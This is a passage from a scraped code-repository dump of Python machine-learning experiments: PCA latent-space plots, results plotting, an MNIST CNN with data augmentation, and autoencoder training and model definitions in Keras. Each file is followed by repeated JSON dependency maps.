"/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,475 | davidhayes3/ME-Project | refs/heads/master | /latent_space_visualization/synthetic_dataset/sd_pca.py | from __future__ import print_function, division
import numpy as np
from sklearn import decomposition
import matplotlib.pyplot as plt
from matplotlib import cm
# Set random seed for reproducibility
np.random.seed(12345)
# =====================================
# Define constants
# =====================================
img_dim = 4
img_rows = 2
img_cols = 2
channels = 1
img_shape = (img_rows, img_cols, channels)
latent_dim = 2
num_classes = 16
image_path = 'Images/sd_pca'
# =====================================
# Load dataset
# =====================================
# Load dataset
X_train = np.loadtxt('Dataset/synthetic_dataset_x_train.txt', dtype=np.float32)
X_test = np.loadtxt('Dataset/synthetic_dataset_x_test.txt', dtype=np.float32)
y_train = np.loadtxt('Dataset/synthetic_dataset_y_train.txt', dtype=np.int)
y_test = np.loadtxt('Dataset/synthetic_dataset_y_test.txt', dtype=np.int)
# =====================================
# Perform PCA Algorithm
# =====================================
pca = decomposition.PCA(n_components=latent_dim)
z = pca.fit_transform(X_train)
# =====================================
# Save 2D latent visualization
# =====================================
fig = plt.figure()
ax = fig.add_subplot(111)
colors = cm.Spectral(np.linspace(0, 1, num_classes))
xx = z[:, 0]
yy = z[:, 1]
# Plot 2D data points
for i in range(num_classes):
ax.scatter(xx[y_train == i], yy[y_train== i], color=colors[i], label=i, s=5)
plt.axis('tight')
plt.savefig(image_path + '_latent_vis.png')
plt.close() | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,476 | davidhayes3/ME-Project | refs/heads/master | /train_models/cifar10_cnn/cifar10_plot_results.py | import numpy as np
import matplotlib.pyplot as plt
class1 = np.loadtxt('Results/classifier1.txt', dtype=np.float32)
class2 = np.loadtxt('Results/classifier2.txt', dtype=np.float32)
class3 = np.loadtxt('Results/classifier3.txt', dtype=np.float32)
class4 = np.loadtxt('Results/classifier4.txt', dtype=np.float32)
class5 = np.loadtxt('Results/classifier5.txt', dtype=np.float32)
class6 = np.loadtxt('Results/classifier6.txt', dtype=np.float32)
num_unlabelled = [100, 200, 500, 1000, 2000, 5000, 10000, 20000, 30000, 50000]
# Plot comparison graph
plt.figure()
plt.plot(num_unlabelled, class1, '-o', num_unlabelled, class2, '-o', num_unlabelled, class3, '-o',
num_unlabelled, class4, '-o', num_unlabelled, class5, '-o')
plt.title('Test Accuracy vs No. of Labelled Examples used for Training')
plt.ylabel('Test Accuracy (%)')
plt.xlabel('No. of labelled examples')
plt.legend(['Basic AE Encoder', 'DAE Encoder', 'AAE Encoder', 'VAE Encoder',
'BiGAN Encoder'], loc='lower right')
plt.grid()
plt.savefig('cifar10_model_compar.png')
plt.show() | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,477 | davidhayes3/ME-Project | refs/heads/master | /other/mnist/bigan/mnist_cnn_fully_augmented.py | '''Trains a simple convnet on the MNIST dataset.
Gets over 99% test accuracy after 12 epochs
3 to 4 seconds per epoch on a TitanX GPU.
'''
import keras
from keras.preprocessing.image import ImageDataGenerator
from keras.datasets import mnist
from keras.datasets import cifar10
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten
from keras.layers import Conv2D, MaxPooling2D
from keras import backend as K
import matplotlib.pyplot as plt
from keras.callbacks import EarlyStopping, ModelCheckpoint
from sklearn.model_selection import train_test_split
import numpy as np
batch_size = 128
num_classes = 10
epochs = 100
channels = 1
num_train_samples = 55000
num_val_samples = 5000
# Function to plot training loss curves
def plot_train_loss(history):
plt.plot(history.history['acc'])
plt.plot(history.history['val_loss'])
plt.title('Model Loss')
plt.ylabel('Loss')
plt.xlabel('Epoch')
plt.legend(['Train', 'Validation'], loc='upper right')
plt.show()
# input image dimensions
img_rows, img_cols = 28, 28
# the data, shuffled and split between train and test sets
(x_train, y_train), (x_test, y_test) = mnist.load_data()
if K.image_data_format() == 'channels_first':
x_train = x_train.reshape(x_train.shape[0], -1, img_rows, img_cols)
x_test = x_test.reshape(x_test.shape[0], -1, img_rows, img_cols)
input_shape = (channels, img_rows, img_cols)
else:
x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, -1)
x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, -1)
input_shape = (img_rows, img_cols, channels)
x_train = x_train.astype(np.float32) / 255.
x_test = x_test.astype(np.float32) / 255.
# convert class vectors to binary class matrices
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
# Define CNN model
model = Sequential()
model.add(Conv2D(32, kernel_size=(3, 3),
activation='relu',
input_shape=input_shape))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes, activation='softmax'))
# Compile models
model.compile(loss='categorical_crossentropy',
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
score = model.evaluate(x_test, y_test, verbose=0)
print('Test loss:', score[0])
print('Test accuracy:', score[1])
# Split training data into training and validation set
X_train, X_val, y_train, y_val = train_test_split(x_train, y_train, test_size=1 / 12., random_state=12345)
# Define augmentation process for images
data_generator = ImageDataGenerator(
rotation_range=40,
width_shift_range=0.2,
height_shift_range=0.2,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True,
fill_mode='nearest')
# Apply augmentation process to train and validation sets
train_batches = data_generator.flow(X_train, y_train, batch_size=batch_size)
val_batches = data_generator.flow(X_val, y_val, batch_size=batch_size)
# Specify callbacks
callbacks = [EarlyStopping(monitor='val_loss', min_delta=0, patience=5, verbose=0),
ModelCheckpoint('mnist_faugmented_cnn.h5', monitor='val_loss', verbose=1, save_best_only=True, mode='min')]
history = model.fit_generator(train_batches,
epochs=50,
steps_per_epoch=num_train_samples // batch_size,
validation_data=val_batches,
validation_steps=num_val_samples // batch_size,
callbacks=callbacks)
model.load_weights('mnist_faugmented_cnn.h5')
score = model.evaluate(x_test, y_test, verbose=0)
print('Test loss:', score[0])
print('Test accuracy:', score[1])
| {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,478 | davidhayes3/ME-Project | refs/heads/master | /train_models/mnist_mlp/mnist_basic_ae_train.py | import numpy as np
from keras.callbacks import EarlyStopping, ModelCheckpoint
from functions.auxiliary_funcs import save_models
from functions.data_funcs import get_mnist
from functions.visualization_funcs import save_reconstructions, plot_train_accuracy, plot_train_loss
from mnist_mlp_models import encoder_model, generator_model
from common_models.common_models import autoencoder_model
# Set random seed for reproducibility
np.random.seed(12345)
# =====================================
# Define constants
# =====================================
img_rows = 28
img_cols = 28
channels = 1
img_shape = (img_rows, img_cols, channels)
latent_dim = 100
num_classes = 10
image_path = 'Images/mnist_basic_ae'
model_path = 'Models/mnist_basic_ae'
# =====================================
# Load dataset
# =====================================
(X_train, _), (X_test, y_test) = get_mnist()
# =====================================
# Instantiate and compile models
# =====================================
encoder = encoder_model()
generator = generator_model()
autoencoder = autoencoder_model(encoder, generator)
autoencoder.compile(optimizer='adadelta', loss='binary_crossentropy', metrics=['accuracy'])
# =====================================
# Train models
# =====================================
# Set training hyper-parameters
epochs = 50
batch_size = 128
patience = 5
# Specify callbacks for training
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=patience, verbose=0, mode='auto')
model_checkpoint = ModelCheckpoint(model_path + '.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
# Train model
history = autoencoder.fit(X_train, X_train,
epochs=epochs,
batch_size=batch_size,
shuffle=True,
validation_split=1/12.,
callbacks=callbacks,
verbose=1)
# Replace current encoder and decoder models with that from the best save autoencoder
encoder = encoder_model()
generator = generator_model()
autoencoder = autoencoder_model(encoder, generator)
autoencoder.load_weights(model_path + '.h5')
# Save encoder and decoder models
save_models(path=model_path, encoder=encoder, generator=generator)
# =====================================
# Visualizations
# =====================================
# Save reconstructions of test images
save_reconstructions(image_path, num_classes, X_test, y_test, generator, encoder, img_rows, img_cols, channels, color=False)
# Plot loss curves
plot_train_accuracy(image_path, history)
plot_train_loss(image_path, history) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,479 | davidhayes3/ME-Project | refs/heads/master | /other/mnist/convolutional_autoencoder/mnist_conv_ae_models.py | from keras.layers import Conv2D, MaxPooling2D, UpSampling2D, Flatten, Dense, Dropout, Activation, Reshape
from keras.models import Sequential
# Define models
def encoder_model():
model = Sequential()
model.add(Conv2D(16, kernel_size=(3, 3), padding='same', input_shape=(28, 28, 1)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2), padding='same'))
model.add(Conv2D(8, (3, 3), padding='same'))
model.add(Activation('relu'))
model.add(MaxPooling2D((2, 2), padding='same'))
model.add(Conv2D(8, (3, 3), padding='same'))
model.add(Activation('relu'))
model.add(MaxPooling2D((2, 2), padding='same'))
model.add(Activation('relu'))
model.add(Flatten())
return model
def decoder_model():
model = Sequential()
model.add(Reshape((4,4,8), input_shape=(128,)))
model.add(Conv2D(8, kernel_size=(3, 3), padding='same'))
model.add(Activation('relu'))
model.add(UpSampling2D((2,2)))
model.add(Conv2D(8, (3, 3), padding='same'))
model.add(Activation('relu'))
model.add(UpSampling2D((2, 2)))
model.add(Conv2D(16, (3, 3)))
model.add(Activation('relu'))
model.add(UpSampling2D((2, 2)))
model.add(Conv2D(1, (3, 3), padding='same'))
model.add(Activation('sigmoid'))
return model
def autoencoder_model(encoder, decoder):
model = Sequential()
model.add(encoder)
model.add(decoder)
return model
def classifier_e_frozen_model(encoder):
model = Sequential()
encoder.trainable = False
model.add(encoder)
model.add(Flatten())
#model.add(Dropout(0.25))
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(10, activation='softmax'))
return model
def classifier_e_trainable_model(encoder):
model = Sequential()
model.add(encoder)
model.add(Flatten())
#model.add(Dropout(0.25))
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(10, activation='softmax'))
return model | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,480 | davidhayes3/ME-Project | refs/heads/master | /train_models/cifar10_cnn/cifar10_plot_models.py | from cifar10_models import deterministic_encoder_model, generator_model
encoder = deterministic_encoder_model()
encoder.summary()
generator = generator_model()
generator.summary()
from keras.utils.vis_utils import plot_model
graph1 = plot_model(encoder, to_file='cifar10_encoder.png', show_shapes=True)
graph2 = plot_model(generator, to_file='cifar10_generator.png', show_shapes=True) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", 